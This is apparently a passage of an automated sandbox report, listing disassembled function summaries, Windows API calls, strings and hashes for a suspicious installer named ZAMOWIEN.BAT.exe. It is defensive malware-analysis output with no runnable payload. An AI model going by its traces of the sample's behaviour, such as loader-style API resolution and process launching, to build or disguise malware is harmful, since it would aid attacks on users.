                                                                                  • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                  • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                                  • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705024DA
                                                                                    • Part of subcall function 7050122C: lstrcpynW.KERNEL32(00000000,?,705012DF,00000019,705011BE,-000000A0), ref: 7050123C
                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 70502460
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7050247B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 4216380887-0
                                                                                  • Opcode ID: d68c1a79ca7075c77724e88dbf1e41f2d5826fb4f0eab480fa5b863bf8028ebd
                                                                                  • Instruction ID: 6a37325e5e8e833b28d87cd13a8fa2f546d65d2fceef31836a5ac15a1bd0fc6a
                                                                                  • Opcode Fuzzy Hash: d68c1a79ca7075c77724e88dbf1e41f2d5826fb4f0eab480fa5b863bf8028ebd
                                                                                  • Instruction Fuzzy Hash: C541BBB1008305EFD715AF31D848A6E7BBCEB94310B204D1EF546CB691EB74A884DB66
                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 3808545654-0
                                                                                  • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                  • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705021F0,?,00000808), ref: 70501639
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705021F0,?,00000808), ref: 70501640
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705021F0,?,00000808), ref: 70501654
                                                                                  • GetProcAddress.KERNEL32(705021F0,00000000), ref: 7050165B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501664
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                  • String ID:
                                                                                  • API String ID: 1148316912-0
                                                                                  • Opcode ID: c007806478f9054f238db14dd7bd4bb0b601f7c99a364304197a2f1f69312c2c
                                                                                  • Instruction ID: da932869782cfb6d26ba3175a35dc26785f791404aafdb149aca0581ab449975
                                                                                  • Opcode Fuzzy Hash: c007806478f9054f238db14dd7bd4bb0b601f7c99a364304197a2f1f69312c2c
                                                                                  • Instruction Fuzzy Hash: B8F098722071387BD62116B78D4CD9BBE9CDF9B2F5B210215F628921A096619D019BF1
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                  • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 2659869361-3355392842
                                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                  • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                  • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                                  APIs
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$Enum
                                                                                  • String ID:
                                                                                  • API String ID: 464197530-0
                                                                                  • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                  • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3748168415-3916222277
                                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 004061A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID: Call
                                                                                  • API String ID: 3356406503-1824292864
                                                                                  • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                  • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                  Strings
                                                                                  • Error launching installer, xrefs: 00405880
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID: Error launching installer
                                                                                  • API String ID: 3712363035-66219284
                                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,764A3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$GlobalLibrary
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 1100898210-3355392842
                                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrlen
                                                                                  • String ID: C:\Users\user\Desktop
                                                                                  • API String ID: 2709904686-3370423016
                                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
